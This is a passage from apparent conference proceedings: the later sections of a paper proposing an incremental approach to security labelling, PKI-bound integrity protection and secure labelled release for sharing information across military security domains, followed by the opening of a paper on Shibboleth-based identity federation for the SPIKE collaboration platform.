used to take the photo. One problem with proprietary file formats and closed-source applications (e.g.<br />

Microsoft Word) is that the meta-information cannot be easily accessed outside the native software<br />

application because the file is a black box. A second problem is that each file format will have its own<br />

approach to storing meta-information. That implies that a labelling solution has to be adjusted for<br />

every format. A solution to this problem is an application-independent approach where the meta-information is stored in a separate object. Storing meta-information separately from information objects in a

standardised format also improves the flexibility to work with meta-information without having to<br />

depend on the knowledge of the file format or implementation in software.<br />
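As a sketch of this idea, a label stored separately from its information object could be a small structured document of its own. The field names and the JSON encoding below are illustrative assumptions, not any NATO or POWDER format:

```python
import json

# Hypothetical label: meta-information kept outside the information object,
# in an application-independent structure that any tool can parse.
label = {
    "object_ref": "reports/patrol-2011-03-17.pdf",  # reference to the information object
    "type_of_file": "document",
    "file_extension": "pdf",
    "author": "Jan de Bruin",
    "security_marking": "NATO RESTRICTED",
    "time_of_creation": "2011-03-17T09:30:00Z",
}

# Because the label is a separate object, it survives a round trip through a
# generic serialisation without any knowledge of the PDF file format.
serialized = json.dumps(label, indent=2)
restored = json.loads(serialized)
```

Because the label lives outside the file, release mechanisms and search tools can read it without opening the (possibly proprietary) information object itself.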

In certain use-case scenarios where third parties need to process another party's meta-data, a standardized specification for conveying the meta-data is needed. NATO has proposed a standard based on XML labelling (Eggen 2010)(Oudkerk 2010). On 1 September 2009 POWDER (Protocol for Web Description Resources) became a W3C Recommendation (POWDER 2009). The POWDER suite


facilitates the publication of descriptions of (multiple) resources. The goal of the POWDER working<br />

group has been to develop a mechanism that allows not only the provision of descriptions but also a way to apply them to groups of (online) resources, and to authenticate those descriptions so that a trust level can be established for them.

2.2 Possibilities of meta-information within a single network<br />

2.2.1 Information Lifecycle Management<br />

Information Lifecycle Management is about the different lifecycle phases that information can go through: from the creation of information, via different manipulations or updates, to the deletion of information or at least its archiving for future reference. Easily accessible meta-information can facilitate Information Lifecycle Management and create new possibilities. With more meta-information available, information objects could be archived for various reasons: for example, archive every file that was created by ‘Danielle Zeeg’ because she no longer works at the company, or archive every information object that has been tagged as ‘SFOR’ because that mission has ended.

Similar to the archiving scenario, aiding users or administrators in searching for information can also benefit from having more meta-information available: for instance, search for all information objects that carry the file extension ‘pdf’, were created in 2010, were authored by ‘Kees de Witte’ and have been tagged with ‘SFOR’.
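The search just described amounts to a filter over a catalogue of labels. The catalogue and its field names below are hypothetical, chosen only to mirror the query in the text:

```python
# Hypothetical catalogue of labels. The query from the text: all objects with
# extension 'pdf', created in 2010, authored by 'Kees de Witte', tagged 'SFOR'.
labels = [
    {"ref": "a.pdf", "ext": "pdf", "year": 2010, "author": "Kees de Witte", "tags": ["SFOR"]},
    {"ref": "b.doc", "ext": "doc", "year": 2010, "author": "Kees de Witte", "tags": ["SFOR"]},
    {"ref": "c.pdf", "ext": "pdf", "year": 2009, "author": "Kees de Witte", "tags": ["SFOR"]},
    {"ref": "d.pdf", "ext": "pdf", "year": 2010, "author": "Danielle Zeeg", "tags": ["SFOR"]},
]

# Every condition is evaluated against the label only; the information
# objects themselves are never opened.
hits = [l["ref"] for l in labels
        if l["ext"] == "pdf" and l["year"] == 2010
        and l["author"] == "Kees de Witte" and "SFOR" in l["tags"]]
# hits == ["a.pdf"]
```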

2.2.2 Integrity protection<br />

It is also possible to embed integrity protection capabilities in meta-information. For example, by creating a digital signature of the information, the signature can later be used to verify whether the information has been changed and to validate who created it. This kind of meta-information helps to protect information as

any modifications to the information can be detected. If meta-information were to include integrity<br />

protection then users or administrators could for example find all data objects that were modified after<br />

the meta-information was generated. Another possibility would be to establish the trustworthiness of<br />

information by distinguishing between data objects that do or do not have integrity protection<br />

embedded in their meta-information.<br />
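A minimal sketch of change detection through meta-information is shown below, using a plain SHA-256 digest stored in the label. This only detects modification; a real deployment would use a digital signature (as in Section 3.3) so that the tag itself cannot be forged along with the data:

```python
import hashlib

def make_integrity_tag(data: bytes) -> str:
    """Digest computed when the label is created and stored inside it."""
    return hashlib.sha256(data).hexdigest()

def is_unmodified(data: bytes, tag: str) -> bool:
    """Re-compute the digest and compare it with the one carried in the label."""
    return hashlib.sha256(data).hexdigest() == tag

original = b"Sensor report: all quiet."
tag = make_integrity_tag(original)

assert is_unmodified(original, tag)                       # untouched object verifies
assert not is_unmodified(b"Sensor report: all quiet!", tag)  # any change is detected
```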

Meta-information can also be used for identification purposes. For example meta-information<br />

containing the type, manufacturer, location or capability of a specific hardware sensor deployed in the<br />

field can be used to select certain sensor feeds, e.g. select feeds of all sensors of type audio-sensor,

or select feeds of all sensors that are located within a one-kilometre radius of GPS coordinate with<br />

latitude 50.84064 and longitude 4.35498.<br />
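Selecting sensor feeds by such meta-information, e.g. all audio sensors within one kilometre of the coordinate above, can be sketched as follows. The sensor records are hypothetical:

```python
import math

def haversine_m(lat1, lon1, lat2, lon2):
    """Great-circle distance in metres between two latitude/longitude points."""
    r = 6371000.0  # mean Earth radius in metres
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dp = math.radians(lat2 - lat1)
    dl = math.radians(lon2 - lon1)
    a = math.sin(dp / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dl / 2) ** 2
    return 2 * r * math.asin(math.sqrt(a))

# Hypothetical sensor labels; select audio sensors within 1 km of the
# coordinate from the text (lat 50.84064, lon 4.35498).
sensors = [
    {"id": "s1", "type": "audio", "lat": 50.8410, "lon": 4.3550},
    {"id": "s2", "type": "video", "lat": 50.8410, "lon": 4.3550},
    {"id": "s3", "type": "audio", "lat": 50.9500, "lon": 4.3550},
]
selected = [s["id"] for s in sensors
            if s["type"] == "audio"
            and haversine_m(s["lat"], s["lon"], 50.84064, 4.35498) <= 1000.0]
# selected == ["s1"]: s2 is the wrong type, s3 is roughly 12 km away
```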

2.3 Possibilities of meta-information in a federated domain<br />

The different types of meta-information discussed in the previous section may also be used in a federated context, not only to regulate information flows between different domains but, as we shall see, for other purposes as well.

Although sharing information may be one of the main aims of NNEC, not all information has to be shared. It may not be relevant or useful, or it cannot be shared due to limitations other than security. In other words, we must be able to make intelligent decisions on which information is eligible for sharing. For example, one may wish to share a photo, but due to bandwidth constraints it is only possible to share it in a resolution lower than 800x600 pixels; software may then be used to automatically scale the photo if it is too large. Another example is to share all recent information objects for which the author is “Jan de Bruin” because he is one of the planners of an important and complex mission. Many more examples can be conceived from operational needs: share feeds only from sensors of a certain type, such as audio; share images and videos made within a certain range of a GPS location with a team on a reconnaissance mission; select which information is sent to such a mission based on keywords; or determine the communication system to use based on an urgency statement in a document. Depending on the granularity and type of the meta-information the possibilities are virtually endless.


2.3.1 Secure labelled release<br />

Meta-information can also be used to protect, i.e. ensure that information is not shared. For example: do not share objects whose meta-information says the creation date is in the current month; do not share videos with a resolution higher than 640x480; do not share presentation files which are classified ‘NATO CONFIDENTIAL’ or higher. We refer to the specific case where criteria suitable for determining releasability to another domain are carried in meta-information bound to an information object as secure labelled release.
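These deny rules can be sketched as a function over a label. The label fields and the classification ordering below are illustrative assumptions, and only the three rules from the text are encoded:

```python
from datetime import date

# Classification ordering assumed for illustration only.
LEVELS = ["NATO UNCLASSIFIED", "NATO RESTRICTED", "NATO CONFIDENTIAL", "NATO SECRET"]

def may_release(label: dict, today: date) -> bool:
    """Apply the deny rules from the text to a label; True means releasable."""
    created = label["created"]
    if (created.year, created.month) == (today.year, today.month):
        return False  # created in the current month
    if label["type"] == "video":
        width, height = label["resolution"]
        if width > 640 or height > 480:
            return False  # video resolution too high
    if label["type"] == "presentation" and \
            LEVELS.index(label["classification"]) >= LEVELS.index("NATO CONFIDENTIAL"):
        return False  # presentation classified NATO CONFIDENTIAL or higher
    return True
```

Note that objects not caught by any deny rule are released; a real release mechanism would more likely combine this with a default-deny policy, as discussed in Section 3.4.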

2.3.2 Dissemination of release information<br />

Somewhere between duty-to-share and duty-to-protect lies the practice of including meta-information that informs the recipient about any restrictions or responsibilities when processing or re-sharing the information. We refer to this as disseminating release information.

These developments are not without consequences and bring certain security challenges. In particular, the binding of meta-information to information must be carefully designed, as must the protection of the integrity of (a) this binding, (b) the information and (c) the meta-information. When meta-information is used

in a sharing mechanism and a user on a local workstation can create meta-information, then the<br />

(integrity of the) workstation and its components become critical because an insecure or untrusted<br />

operating system might trick a user into sharing the wrong information. The required level of<br />

assurance depends largely on the level of security that needs to be attained but is also affected by the<br />

specific application of meta-data.<br />

There must also be a foundation to build the meta-information on, such as a system to store and manage meta-information and to retrieve the meta-information given the information itself, or vice versa. There are many other related challenges in handling data, e.g. how to handle conflicting sets of meta-information, how meta-information can be revoked or changed, and so on. These issues need to be addressed in an information management system 1 .

3. Labelling: An incremental approach<br />

In the previous section we have seen that labelling has manifold purposes. The emphasis has mostly<br />

been on secure labelled release for exchanging information across different security domains. We<br />

propose an incremental approach in which partially related developments are tied together so that<br />

functionality enabled by labelling can be realised step-by-step. This has two main advantages. First, it will make the development process better organised and hence more efficient and cost-effective. Second, users and organisations can benefit from labelling directly because the new functionality can be used as soon as the step is completed. This is also beneficial for the user experience.

To achieve this incremental approach, a clear overview is needed of which steps must be taken to<br />

realise each piece of intermediate functionality whilst ensuring that the ultimate goal, which is also the most complex, can still be reached. In this section we propose a plan to achieve secure labelled release in a series of smaller, incremental steps that add useful functionality to existing or new

processes. We distinguish four phases:<br />

1. Information lifecycle management<br />

2. Disseminating cross-domain information<br />

3. Integrity protection<br />

4. Secure labelled release.<br />

3.1 Information lifecycle management<br />

In this context, labelling functionality is used to improve information management within a single<br />

information domain. A user may add additional meta-information to an information object, such as the<br />

author, title, publication date, classification – the possibilities are virtually endless. This enables<br />

various management functionality to be used on the document as discussed in Section 2, including<br />

archiving, searching, and deleting information.<br />

1 An information management system comprises more aspects than a content management system, which is merely a container to store and share information within a single domain.


The security requirements are minimal, as the binding between the document and the label is weak at<br />

this point. Basically the label only needs to contain a reference to the original document. Within an<br />

information domain, it could be used for enforcing need-to-know separation or communities of<br />

interest. Figure 2 shows an abstraction of the functionality needed for this approach.<br />

[Figure: a labelling application on the workstation exchanges labels and documents with the information management system]

Figure 2: Labelling for information lifecycle management purposes<br />

Essentially, the architecture for this set-up contains only two main aspects:<br />

- An application that can create labels.
- An information management system: an environment or system that can be used to store information and labels together.

When a user creates information, the labelling application can be used to link several attributes to the<br />

information. The information and the label will both be stored in the information management system<br />

(IMS). The user may disseminate the information either through the IMS or by separate means. The<br />

IMS can in the latter case be used to retrieve the label when the information is presented.
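A minimal sketch of such an IMS, keyed on a digest of the document so that the label can be retrieved when only the information itself is presented, could look as follows. The class and method names are hypothetical:

```python
import hashlib

class InformationManagementSystem:
    """Minimal sketch: stores documents and labels together, and can look a
    label up from the document content when the document arrives by other means."""

    def __init__(self):
        self._documents = {}  # document digest -> document
        self._labels = {}     # document digest -> label

    def store(self, document: bytes, label: dict) -> str:
        digest = hashlib.sha256(document).hexdigest()
        self._documents[digest] = document
        self._labels[digest] = label
        return digest

    def label_for(self, document: bytes):
        """Retrieve the label when only the information itself is presented."""
        return self._labels.get(hashlib.sha256(document).hexdigest())

ims = InformationManagementSystem()
doc = b"Operation order 42"
ims.store(doc, {"author": "Jan de Bruin", "classification": "NATO RESTRICTED"})
```

Note that the digest here is only a lookup key; as the text says, the binding between document and label at this stage is deliberately weak.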

3.2 Disseminating cross-domain information<br />

We can extend the information lifecycle management functionality so that it is possible to inform a<br />

recipient of information in another information domain about the way the information should be<br />

treated; e.g. under what memorandum of understanding it is exchanged or what classification is<br />

attached to the information. In this case when a user sends the information to a recipient, the label<br />

with the necessary meta-information has to be sent as well. This purpose is mostly intended for information sharing across different information domains, where each information domain has the

same or a very similar security policy. The label here has an informative, procedural aim and does not<br />

necessarily form a technical enforcement.<br />

[Figure: the workstation's labelling application and the information management system as in Figure 2, extended with a release mechanism through which document and label leave the domain]
Figure 3: Labelling for disseminating cross-domain information



In this setup we add a third element, namely the release mechanism. Essentially, the other elements<br />

stay the same. This release mechanism has a two-fold purpose. The first is to verify that a suitable<br />

label accompanies the information and if not, try to retrieve the label from the information<br />

management system. The suitability is established by validating that all the necessary information is<br />

present. The second purpose is the ability to translate an internal label to an external label. For example, certain elements may be removed from the label (such as the name of the author), other information may be added (e.g. the date of the information exchange), or a different labelling structure may be used for internal and external purposes 2 .
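The translation step can be sketched as follows. Field names are illustrative; here the author is removed from the internal label and the date of exchange is added:

```python
from datetime import date

def to_external_label(internal: dict, exchange_date: date) -> dict:
    """Sketch of internal-to-external label translation: drop the author,
    add the date of exchange, keep everything else unchanged."""
    external = {k: v for k, v in internal.items() if k != "author"}
    external["date_of_exchange"] = exchange_date.isoformat()
    return external

internal = {"title": "Patrol report", "author": "Jan de Bruin",
            "classification": "NATO RESTRICTED"}
external = to_external_label(internal, date(2011, 3, 17))
# external carries the exchange date but no author; internal is untouched
```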

3.3 Integrity protection<br />

The third step in extending the labelling architecture is to realise integrity protection of information.<br />

Integrity protection refers to the means to establish whether a document is authentic or has been changed. As a secondary benefit, it may be possible to establish who attested to the document's authenticity.

The label has to be extended to include a secure binding to link the information and the label together,<br />

in such a way that it can always be detected if an existing label is attached to other (different or<br />

altered) information, or if the label content has been changed. Any change to an information object can then be detected, because it would result in a different object.

For the binding to be secure we need cryptographic support. A method, amongst others, of realising<br />

this is through a PKI. A user has to use a private key to sign the binding in the label, which also links the binding directly to the user; that is, it can easily be determined who created the label. To validate

the integrity of the document, the public key of the user that created the binding can be used to verify<br />

the binding in the label. In case any changes have been made, the verification will fail.<br />
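A sketch of creating and verifying such a binding is shown below. To keep the example self-contained, an HMAC over the document digest and the label stands in for the PKI-based signature described above, so the key here is symmetric rather than a private/public pair; the detection logic is the same:

```python
import hashlib
import hmac

def bind(document: bytes, label: bytes, signing_key: bytes) -> bytes:
    """Bind label to document: authenticate the document digest plus the label.
    In a real system this would be an asymmetric signature under a PKI."""
    digest = hashlib.sha256(document).digest()
    return hmac.new(signing_key, digest + label, hashlib.sha256).digest()

def verify(document: bytes, label: bytes, binding: bytes, signing_key: bytes) -> bool:
    """Verification fails if the document, the label or the binding changed."""
    return hmac.compare_digest(bind(document, label, signing_key), binding)

key = b"demo-signing-key"
doc = b"Operation order 42"
label = b'{"classification": "NATO RESTRICTED"}'
binding = bind(doc, label, key)

assert verify(doc, label, binding, key)
assert not verify(doc + b"!", label, binding, key)  # altered document detected
assert not verify(doc, label + b"!", binding, key)  # altered label detected
```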

[Figure: the set-up of Figure 3 extended with a PKI providing certificates and a CRL, a trusted OS under the workstation's labelling application, and a release mechanism and IEG at the domain border handling document and label]

Figure 4: Labelling for integrity protection<br />

For a high assurance environment 3 , we also need to ensure that the labelling process works correctly.<br />

In other words we must have a level of assurance that the information the user actually labelled is the<br />

correct information and has not been modified unbeknownst to the user during the process. We<br />

cannot attain that level of assurance on a normal platform (operating system); therefore we need an<br />

operating system or platform that can provide us the needed assurance. This has been named a<br />

trusted operating system. Essentially, each step in the process of labelling must be carried out under<br />

2 Note that the release mechanism does not comprise the entire interconnection here, there may be other elements needed too,<br />

for instance cryptographic units or firewalls to ensure a secure connection.<br />

3 For instance information domains which process highly classified information.<br />


conditions that are guaranteed by the operating system, but on the other hand a user must also be<br />

capable of performing his regular tasks on the same platform. We see opportunities to establish this<br />

based on a virtualisation layer on top of a minimal, but trusted core operating system. One virtual<br />

machine will comprise the normal functionality and a second will form the labelling application with strict limitations; this concept is further elaborated upon in (Verkoelen 2010).

An architecture of a workstation that is suitable for creating labels in a trusted manner is shown in

Figure 5 (Hartog 2010). In essence, this is a virtualisation platform with two virtual machines. One is<br />

used as a workstation with the common applications. The other is used specifically for labelling which<br />

is focussed on binding a label to a given information object in such a way that the process cannot be<br />

disrupted and assurance can be given that only the provided information object is labelled and<br />

nothing else. The information to be labelled has to be exported from the generic to the specific virtual<br />

machine where a label can be created. Then the label can be transferred back to the workstation.<br />

[Figure: a workstation consisting of a high assurance platform on the hardware, hosting two virtual machines: a desktop environment and a labelling environment]

Figure 5: Architecture of a workstation for trusted labelling<br />

The needed level of assurance is provided by a high assurance platform (HAP). Its core component can be a separation kernel (Rushby 1981)(Information Assurance Directorate 2007), which is in control of all resources in the system and of all communication between the virtual machines. The virtualisation is layered on top of the HAP. In certain cases with high assurance requirements specific hardware may have to be used, but mostly it can be based on generic hardware.

3.4 Secure labelled release<br />

The final objective of this incremental approach is the secure labelled release. The label can then be<br />

used to validate the suitability of exchanging a document across different security domains where the<br />

security policies of the domains may be different. The suitability is determined by the meta-information stored in a protected label. This could for example refer to the classification of the information in the document, but may also refer to capabilities of the source of the information (Smulders 2010), such as the quality of the camera used to take an aerial photograph or the range of a radar; combinations are of course also possible. The validation takes place at the border of the information domain. The label is intended for internal usage and does not have to be included after the information has been released. However, it is also possible to translate the label for external use, as in the case of “Disseminating release information”.

To extend the integrity protection set-up to a full secure labelled release setup we have to add an<br />

extended release mechanism. This extension is twofold. In the first place the release mechanism<br />

must be capable of integrating with the PKI to validate the authenticity of the label and match it<br />

against the document. The release mechanism has to validate the certificate of the user that created<br />


the label (by way of, for example, a CRL) and ascertain the integrity of the document so that it can be

established that the label matches the document and the label is valid.<br />

[Figure: the set-up of Figure 4 with a trusted OS under both the workstation's labelling application and the release mechanism; the release mechanism checks document, label and CRL against the PKI's certificates before release]

Figure 6: Secure labelled release<br />

In the second place, since the release mechanism is now a security device that mediates between<br />

different security domains, it is necessary to raise the assurance of the correct behaviour of this<br />

platform. Therefore it is necessary to introduce a trusted platform for this element as well. In contrast<br />

to what is needed on the workstation, this system is dedicated to a single task and hence, the<br />

operating system only has to ascertain the correct working of that platform and thus this is a different<br />

form of a trusted OS.<br />

To determine whether the document is suitable for release the contents of the label have to be<br />

matched against a policy; each of the criteria in the label may affect the decision of the release<br />

mechanism. A simplified policy could for example be “all documents with a classification of<br />

Unclassified or NATO Restricted may be released”; and “all images with a resolution less than<br />

800×600 may be released”. A real policy may actually be quite complex to establish. Important issues<br />

are establishing the completeness and consistency of the release policy.<br />
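The simplified policy quoted above could be encoded as follows. This is a sketch only; the label fields, the exact classification strings and the default-deny behaviour are assumptions:

```python
# Illustrative encoding of the simplified release policy from the text:
# documents classified Unclassified or NATO Restricted may be released, and
# images with a resolution less than 800x600 may be released.
RELEASABLE_CLASSIFICATIONS = {"Unclassified", "NATO Restricted"}

def releasable(label: dict) -> bool:
    """Match the contents of a label against the simplified release policy."""
    if label["type"] == "document":
        return label["classification"] in RELEASABLE_CLASSIFICATIONS
    if label["type"] == "image":
        width, height = label["resolution"]
        return width < 800 and height < 600
    return False  # default-deny for anything the policy does not mention

# Example decisions of the release mechanism:
assert releasable({"type": "document", "classification": "Unclassified"})
assert not releasable({"type": "image", "resolution": (800, 600)})
```

Even this toy policy shows why completeness and consistency matter: every object type and every combination of criteria must map to exactly one decision, which is why default-deny is the usual safe fallback.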

3.5 Functional building blocks<br />

This section has shown four situations in which meta-information encapsulated in a label adds useful functionality to existing or new processes. For these different applications we have shown the

necessary functional building blocks needed to realise them. This section provides an overview of the<br />

relation between the different applications and functional building blocks and also shows the essential<br />

components within each functional building block.<br />

Figure 7 provides an overview of the relation between the different applications and functional building<br />

blocks. From left to right the figure describes an incremental approach to obtain more complex

application functionality with the use of the functional building blocks discussed in Section 3. We<br />

distinguish four basic building blocks:<br />

- A labelling mechanism that can be used to construct meta-information.
- A release mechanism that controls under which conditions information can be shared with other domains.
- A trusted OS to attain the required level of assurance.
- A PKI to ascertain the binding between the label and the information object.



[Figure: four stages from left to right. Information lifecycle management needs only the labelling block (label creation). Disseminate release information adds a release mechanism (verification, label translation). Integrity protection adds a PKI (CA, certificate validation, smartcard authentication) and a trusted OS (secure login, HAP), and extends labelling with a secure binding. Secure labelled release extends the release mechanism with certificate validation and authorisation]

Figure 7: An incremental approach to introduce labelling<br />

Each functional building block can consist of several components which have to be implemented depending on the functionality we require. When these requirements increase, additional functional building blocks are required and the complexity of the building blocks may grow as more components are added. As such we have established an incremental approach in which we add complexity in small steps while creating new, useful functionality at each step.

The first basic step in using labelling is to implement a system which can create labels and utilise them in an (existing or new) Information Management System to manage information. Once all the processes and procedures are in place and people are used to working with this new form of information management, the labelling can be extended with more functionality. A next step can be to implement a release mechanism which can decide to translate internal labels into external labels and share these labels with other domains. To ensure the integrity of the data object and metadata object, PKI and Trusted OS functionality can be added. In the end all four functional building blocks are in place, resulting in a “secure labelled release” application.<br />
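The release-mechanism step can be sketched as follows; the internal and external label names, the mapping table and the ordering are invented for illustration, not taken from any real security policy.

```python
# Hypothetical sketch: a release mechanism translating internal labels
# into external labels before sharing with another domain. Unknown labels
# and insufficiently cleared target domains are denied by default.

ORDER = ["UNCLASSIFIED", "RESTRICTED", "SECRET"]  # illustrative hierarchy

INTERNAL_TO_EXTERNAL = {
    "COMPANY-CONFIDENTIAL": "RESTRICTED",
    "COMPANY-SECRET": "SECRET",
}

def release(internal_label, target_domain_max):
    """Translate the internal label; refuse release if no mapping exists
    or the external label exceeds what the target domain may receive."""
    external = INTERNAL_TO_EXTERNAL.get(internal_label)
    if external is None:
        return None  # unknown label: deny by default
    if ORDER.index(external) > ORDER.index(target_domain_max):
        return None  # target domain not cleared for this information
    return external
```

The deny-by-default behaviour reflects the principle that the information owner stays in control: nothing leaves the domain without an explicit, policy-backed mapping.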

Each step brings further advantages: complexity is reduced, people have time to experience and use the new functionality, processes and procedures change incrementally, and the functionality gains better acceptance in the organisation.<br />

4. Conclusion<br />

Labelling is an important step in providing the technical means to realise a NEC environment and implement a duty-to-share mechanism. Not only does it allow the sharing of information, it also establishes a basis on which the information owner can remain in control of which information is shared.<br />

Creation of labels is in itself not a difficult process, nor is validation of the correctness of such a label; most of the means for these are already in place, e.g. in the form of a PKI. Assurance is a totally different criterion. To attain the right level it is vital to ascertain that the label is attached correctly to the right information, which requires many additional controls. Crucial in this respect is the choice of platform, as this is the basis for assurance.<br />

Implementing labelling for a high-security environment is a costly and long-term development. In the long run it can be a very useful technique for building a solution to exchange information across different security domains, but in the short term obtaining results is difficult. However, encapsulating metadata in a label can be useful for many other purposes as well. We argued that<br />



Harm Schotanus et al.<br />

these aspects can be combined to develop a labelling solution that in the end delivers a cross domain solution, but in the meantime is already useful for several purposes. We have proposed an incremental approach to creating a cross domain solution.<br />

By starting with labelling for information management purposes, we can quickly gain results, as it can make accessing the right information easier. This can be extended with limited effort to support a method to exchange release information with other domains having a similar security policy. This way we have not only provided the technical basis for labelling, but also prepared the users to work with labels and appreciate their purpose. The third step can be to implement integrity protection, which requires elevating the assurance of the label creation process. Finally, we reach a true cross domain solution if we elevate the assurance on the validation side as well. Clearly, careful planning and a solid overview of each individual step, as well as of the whole, are necessary to reach the goal; implementing a cross domain solution in one big step may simply be a bridge too far.<br />

5. Future work<br />

The proposed means to realise a cross domain solution can be further extended with other<br />

functionality. These require further research to determine feasibility and technical means to realise<br />

them.<br />

Fine-grained control over information, e.g. labels on individual chapters or paragraphs.<br />
Automatic labelling of information; for instance, information from sensors such as radar or cameras can be labelled automatically, depending on both the content and the capabilities used to generate the information.<br />
Integration of applications and labelling, so that the user can control the process of labelling (semi-)automatically from the applications.<br />
Life cycle management of information, e.g. the use of labels to express changes in the information.<br />
Cross Domain Solutions; using different labels can be a very useful technique to exchange information across different security domains. Based on a domain policy, external labels can be translated into an internal label which is understandable within the domain.<br />
Methodology for policy development. A core concept of an automated release mechanism is enforcing a policy; creating a usable policy is a complex task, hence a methodology to develop policies based on all rules and agreements is needed to ensure their completeness and consistency.<br />
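Two of the properties such a policy-development methodology must verify can be sketched mechanically: completeness (every classification/domain combination is covered by some rule) and consistency (no two rules contradict each other). The rule representation and names below are invented for illustration.

```python
from itertools import product

# Illustrative universe of classifications and partner domains.
CLASSIFICATIONS = ["UNCLASSIFIED", "RESTRICTED"]
DOMAINS = ["domain-a", "domain-b"]

def check_policy(rules):
    """rules: list of ((classification, domain), decision) pairs.
    Returns (missing, conflicting): combinations with no rule, and
    combinations covered by contradictory rules."""
    seen = {}
    conflicting = set()
    for (cls, dom), decision in rules:
        key = (cls, dom)
        if key in seen and seen[key] != decision:
            conflicting.add(key)
        seen[key] = decision
    missing = [k for k in product(CLASSIFICATIONS, DOMAINS) if k not in seen]
    return missing, sorted(conflicting)
```

A gap in coverage or a contradiction would surface here before the policy is ever enforced by the release mechanism.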

6. References<br />

Buckman, T. (2005) “NATO Network Enabled Capability Feasibility Study – Executive Summary”, [online] version 2.0, NC3A, http://www.dodccrp.org/files/nnec_fs_executive_summary_2.0_nu.pdf<br />
Schotanus, H.A., Boonstra, D. and te Paske, B.J. (2009) “Information Labeling – Cross-Domain Solutions”, Intercom Vereniging Officieren Verbindingsdienst, 38th year, No. 2<br />
Martis, E.R., et al. (2006) “Information Assurance: Trendanalysis”, TNO report TNO-D&V 2006 B312<br />
Eggen, A., et al. (2010) “Binding of Metadata to Data Objects – A Proposal for a NATO Specification”, Norwegian Defence Research Establishment (FFI) & NC3A<br />
Hartog, T., Degen, A.J.G. and Schotanus, H.A. (2010) “High Assurance Platform for Labelling Solutions”, TNO Information and Communication Technology<br />
Rushby, J. (1981) “Design and Verification of Secure Systems”, ACM Operating Systems Review, Vol. 15, No. 5, pp 12-21, http://www.csl.sri.com/papers/sosp81/sosp81.pdf<br />
Smulders, A.C.M. (2010) “Rubriceren bottleneck voor informatiedeling” [Classification as a bottleneck for information sharing], Intercom Vereniging Officieren Verbindingsdienst, 39th year, No. 1, pp 33-34<br />
Verkoelen, C.A.A., et al. (2010) “Security Shift in Future Network Architectures”, Information Assurance and Cyber Defence, NATO RTO IST-091<br />
Information Assurance Directorate (2007) “U.S. Government Protection Profile for Separation Kernels in Environments Requiring High Robustness”, version 1.03, http://www.niap-ccevs.org/pp/pp_skpp_hr_v1.03.pdf<br />
Oudkerk, S., et al. (2010) “A Proposal for an XML Confidentiality Label Syntax and Binding of Metadata to Data Objects”, Information Assurance and Cyber Defence, NATO RTO IST-091<br />
W3C (2009) POWDER: Protocol for Web Description Resources, 1 September 2009, http://www.w3.org/2007/powder/<br />



Information Management Security for Inter-Organisational<br />

Business Processes, Services and Collaboration<br />

Maria Semmelrock-Picej¹, Alfred Possegger² and Andreas Stopper²<br />
¹eBusiness Institute, Klagenfurt University, Austria<br />
²Infineon IT-Services GmbH Austria, Austria<br />

Maria.Semmelrock-Picej@aau.at<br />

Alfred.Possegger@infineon.com<br />

Andreas.Stopper@infineon.com<br />

Abstract: Web-based collaborations and cross-organizational processes typically require dynamic and context-based interactions between involved parties and services. Due to the temporary nature of collaboration and the evolving competencies of the involved companies over time, security issues like trust, privacy and identity management are of high interest for the long-lasting success of virtual collaborations. This paper addresses this issue by presenting some results of an international research project. The vision of this project is to implement a virtual cooperation system for SMEs to be used for realizing competitive advantages through virtual cooperations. The paper describes some results of this system; in particular, we discuss issues concerned with identity management. Identity federation is one of the key concepts of SPIKE to support “virtual organizations”, their fast setup, comfortable maintenance and orderly closing. This paper describes the mechanisms by which collaboration partners, registered at the SPIKE platform, are authenticated using a standardized identity federation protocol – Shibboleth. It is shown how the identity data of a company, using its own IDMS, can be integrated into the SPIKE platform and what a company has to set up from a technical point of view so that its employees can be authenticated via Shibboleth. Further, an approach is presented that is suitable mostly for SMEs which do not have their own IDMS.<br />

Keywords: eCollaboration, security, identity management, phases of cooperation<br />

1. Introduction<br />

Nowadays competition is no longer between single enterprises but among supply chains with numerous actors. Effective supply chain management has therefore become a potentially valuable way of securing a competitive advantage and improving organizational performance. Firms are seeking synergistic combinations of resources and changing their roles and value positions through digital collaborations (Klein, Rai and Straub 2007). However, the understanding of how this works and which areas are most important for success is still incomplete.<br />

It has been noted in the literature that information and communication technologies have a significant impact on the economic situation and knowledge-based activities in peripheral regions. Especially for SMEs in the cross-border region of Carinthia and Slovenia, Ziener (2010) identified a low rate of internationalization, a small number of cross-border supply chain networks, and activities limited to regional borders.<br />

ICTs support collaboration among people with different competencies and capabilities in virtual collaborations (Mohrmann et al. 2003), facilitate knowledge access and sharing (Davenport and Prusak 1998), and enable the codification and dissemination of explicit knowledge (Zack 1999). Virtual collaboration also increases the knowledge about who knows what, enabling virtual joint work and supporting the easier and faster setup of short-term, project-based and loosely coupled chains among participants. Accordingly, studies have shown that participation of small and medium-sized enterprises in eCollaboration environments could improve their situation in peripheral regions.<br />

However, despite the general agreement on the positive impacts of virtual collaborations, detailed micro-level evidence on the preconditions for success is limited. Yet it has been shown that the way SMEs interact in collaborative environments depends to a large extent on the security functionalities and their management, which impact almost all knowledge-related activities as a basic precondition. In other words, existing work typically narrows down to very specific processes or activities. This contribution emphasizes the potential capability of ICTs and their fundamental role in creating a virtual dimension through which companies can share and create new knowledge at both the tacit and the explicit level.<br />

Companies have a serious privacy concern about how their information is used, disclosed and<br />

protected and the degree of control they have over the dissemination of the information. Especially<br />


they are concerned about possible undesirable economic consequences resulting from a misuse of such information. Indeed, many companies express concern about privacy and identity management, and research suggests that identity management is of focal concern to companies. Identity management is a hot area, experiencing considerable growth, and is increasingly one of the challenging key disciplines an IT department of a midsize to large enterprise has to address (Jackson 2010). This is not surprising, because organizations, supply chains and customers have become tightly connected in the digital networked economy. Another important aspect is that of identity theft and misuse, leading to serious damage within enterprises and also in the development of the Internet.<br />

The major contribution of this paper is in revealing and discussing the identity federation approach that impacts trust in collaborative environments. In doing so, this paper shows, based on the standardized Shibboleth protocol, how the identity data of a company can be integrated when taking part in collaborations. The second contribution of this paper is in identifying the requirements of the smallest companies in this field. When talking about these issues in an enterprise context, mostly midsize to large enterprises are the focus of consideration. This paper presents solutions which bridge this gap by offering the necessary functionality also to the smallest companies. These findings should enable very small companies to start collaborating virtually as well.<br />

2. The SPIKE project<br />

2.1 Introduction<br />

SPIKE aims at researching and implementing a virtual collaboration platform. In order to reach these goals, SPIKE’s security infrastructure is highly reliable and adaptive and consists of the following layers (see Figure 1) (Semmelrock-Picej and Possegger 2010):<br />
